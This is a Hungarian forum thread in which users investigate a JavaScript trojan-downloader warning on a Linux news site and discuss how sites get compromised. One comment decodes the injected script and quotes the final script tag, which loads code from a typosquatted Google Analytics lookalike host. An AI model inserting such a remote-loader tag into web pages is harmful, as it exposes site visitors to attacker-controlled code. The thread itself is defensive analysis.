A http://www.linuxbazis.hu oldalt nézve /pár hete/ a Nod32 erre figyelmeztet...
- JS/TrojanDownloader.Small.NBF trójai
Másnál is fennáll ez a hiba?
- 3057 megtekintés
Hozzászólások
Nézd meg az oldal forrását. A legutolsó sorban van egy kis érdekesség.
--
Elméletileg nincs különbség elmélet és gyakorlat között. Gyakorlatilag van.
- A hozzászóláshoz be kell jelentkezni
szép
---
/* No comment */
Ketchup elementál megidézése a sajt síkra
- A hozzászóláshoz be kell jelentkezni
:-)
Fura volt a sok üres sor elötte... döbb.
- A hozzászóláshoz be kell jelentkezni
Ez nagyon gáz!!
- - - - -
And the man in the rain picked up his bag of secrets, and journeyed up the mountainside, far above the clouds, and nothing was ever heard from him again...
- A hozzászóláshoz be kell jelentkezni
Az a baj, hogy ez bárkivel megeshet. :(
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Hát azért bárkivel nem.
- A hozzászóláshoz be kell jelentkezni
Való igaz, akinek csak egy statikus index.html-je van, annak kevesebb a rizikója.
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Azért valami oka csak van, hogy nem törnek fel minden dinamikus oldalt.
- A hozzászóláshoz be kell jelentkezni
+1
kötöjelkötöjel
Kiszámít mér és berakodás idő -ból -a Pókháló
- A hozzászóláshoz be kell jelentkezni
A bárkivel megtörténhet alatt azt értem, hogy egyszer eljöhet a nap, hogy kijön egy olyan exploit, hogy mire fixálnád a hibát már késő, mert "keleten korábban keltek".
Igen, oka van, hogy nem törnek fel minden dinamikus oldalt. Az okai:
- érdektelenek
- vagy az átlagnál talán többet törődnek velük
De ez nem jelenti azt, hogy sosem fogják. Azonban nekem nincsenek illúzióium. Ezeket a szoftvereket is emberek írják, ezeket az oldalakat is emberek üzemeltetik.
Amit akarnak, azt fel is törik.
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Na azért ez nem ugyan az mint pl apachehoz egy 0day remote exploit. Az sql injection, már elég rég óta ismert hiba, számtalan publikus leírás van ahhoz is, hogy hogy kell kihasználni és ahhoz is, hogy hogy kell kivédeni. Ennek ellenére még mindig rengeteg oldalon megtalálható ez a hiba(ami gondolom a php nyelv könnyűségének köszönhető). Szerintem bunkóság a regisztrált felhasználókkal szembe, egy ilyen oldalt kirakni a netre, de az mégnagyobb bunkóság, hogy sok cég ezeket a szarokat százezrekért árulja.
Szóval az az állítás nem teljesen igaz, hogy bárkivel előfordulhat, hogy a weboldalán keresztül megtörik a szervert, vagy pl ilyen kódot helyeznek el az oldalán.
- A hozzászóláshoz be kell jelentkezni
"Az sql injection, már elég rég óta ismert hiba"
A stack/heap overflow, esetleg race condition, ami az "apachehoz egy 0day remote exploit" lehetosegeit eleg jol lefedi, nem kulonben.
--
Fontos feladatot soha ne bizz olyan gepre, amit egyedul is fel tudsz emelni!
- A hozzászóláshoz be kell jelentkezni
"Amit akarnak, azt fel is törik."
De nem azert, hogy windozos trojait tegyenek ra.
--
Fontos feladatot soha ne bizz olyan gepre, amit egyedul is fel tudsz emelni!
- A hozzászóláshoz be kell jelentkezni
Csak be lehet lőni valahogy a védelmet.. itt már volt ilyen vagy próbálkoztak?
- - - - -
And the man in the rain picked up his bag of secrets, and journeyed up the mountainside, far above the clouds, and nothing was ever heard from him again...
- A hozzászóláshoz be kell jelentkezni
A kérdés az, hogy óránként hányszor próbálkoznak? Számtalanszor. Automatikus scriptek óránként százával. Hogy mikor találnak be valami olyasmivel amire az ember nem számít? Ki tudja? Ki tudja, hogy mikor derül ki egy olyan hiba valamelyik alkalmazott szoftverben amit mire javítanál már rég kihasználták? Ki tudja hány 0day hiba van ezekben a szoftverekben?
Ma már minden lúzer tudja használni az olyan eszközöket, mint például a metasploit. Ész sem kell hozzá. Utazz el nyaralni és közben imádkozz, hogy nem jelenik meg valami okosság abban a két hétben.
A legtöbb, amit tehetsz az az, hogy megpróbálod az esélyét csökkenteni annak, hogy ne kerülj ilyen helyzetbe.
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Igen nyilván úgy kezdik, hogy egy script kikeresteti mondjuk a google-val, hogy pl. "powered by xyz-cms" aztán a talált linkekre kiküld egyéb dolgokat... így csinálják a "script-kid"-ek, just for fun alapon. pl. lecseréli az index.php-t egy másik fájlra amiben az van, hogy "hacked by Béla" + ilyesmi. :)
Egyébként ha az ember viszonylag "szokatlan" megoldásokat választ pl. Apache helyett lighttppd, debian (neadj ég w2k) helyett OpenBSD, MySQL helyett PostgreSQL, stb.stb. (mindenki másra esküszik úgyis) talán nölvelhatő az "esély".
Viszont, nincs 100%-biztonság az tény! Helyette esélyek és valószínűségek.
- - - - -
And the man in the rain picked up his bag of secrets, and journeyed up the mountainside, far above the clouds, and nothing was ever heard from him again...
- A hozzászóláshoz be kell jelentkezni
Szívás! :)
--
Fight / For The Freedom / Fighting With Steel
- A hozzászóláshoz be kell jelentkezni
Dobtam nekik mailt a kapcsolatfelvételen keresztül, remélem olvassák vagy a hup-ot :)
--
Elméletileg nincs különbség elmélet és gyakorlat között. Gyakorlatilag van.
- A hozzászóláshoz be kell jelentkezni
Johat persze ott vigyorog sql inject...
Mit is var az ember :)
___________________
http://kdavid.eu
- A hozzászóláshoz be kell jelentkezni
Szerintem inkabb csak hozzafuztek valamit a index.php-hez. Ha megnezed a script ele jo sok ujsor is bekerult, ami nem jellemzo sql injectionnel, mert minek plusz annak hatasai nem a /html utan lennenek lathatoak szerintem.
Gondolom az egyik valaki, akinek van ftp accountja kapott egy trojait a rossz idore valo tekintettel, ami begyujtotte a hozzaferes adatait majd ugyanaz vagy masik bot meg kicsit kibovitette az index.php-t.
--
HUP Firefox extension
- A hozzászóláshoz be kell jelentkezni
googleanalitics.net?
lol
--
"SzAM-7 -es, tudjátok amivel a Mirage-okat szokták lelőni" - Robi.
- A hozzászóláshoz be kell jelentkezni
ezt a noscript kiszuri
udv Zoli
- A hozzászóláshoz be kell jelentkezni
Amúgy mit csinál ez a script? :D Nem nagyon értek hozzá csak kíváncsi lennék, és ebből az össze-visszaságból nem sokat veszek ki :D
---
Debian "lenny", 2.6.24-amd64
- A hozzászóláshoz be kell jelentkezni
Hív egy document.write-ot, aminek az eredménye egy újabb script, ami szintén hív egy document.write-ot, és így tovább. A Firefox Web developer toolbar-jával meg lehet nézni a generálódott forrást. A negyedik lépésben generált script tag a következő: <script language="JavaScript" src="http://www.googleanalitics.net/__utb.js?"></script>
Ez pedig cseles dolgot csinálhat. Mondjuk átirányítja a linkeket pornóoldalakra, reklámot szúr be, vagy ami a támadónak eszébe jut. Jelenleg mintha nem lenne azon a helyen semmi, lehet, hogy késöbb lesz, lehet, hogy a Referrer headert is nézi.
- A hozzászóláshoz be kell jelentkezni
Köszi az infót. Nemsemmi, most már látom van értelme hogy használom a NoScriptet :P
---
Debian "lenny", 2.6.24-amd64
- A hozzászóláshoz be kell jelentkezni
Böngészés NoScript+AdBlock modulok nélkül olyan mint Lesotho-ban óvszer nélkül örömlánnyal hálni.
http://hu.wikipedia.org/wiki/Lesotho
Akinek nem esne le egyből.... khm :D
"Nagyjából 40%-uk HIV fertőzött."
- A hozzászóláshoz be kell jelentkezni
Megnéztem megint: még mindig ott van :)
- - - - -
And the man in the rain picked up his bag of secrets, and journeyed up the mountainside, far above the clouds, and nothing was ever heard from him again...
- A hozzászóláshoz be kell jelentkezni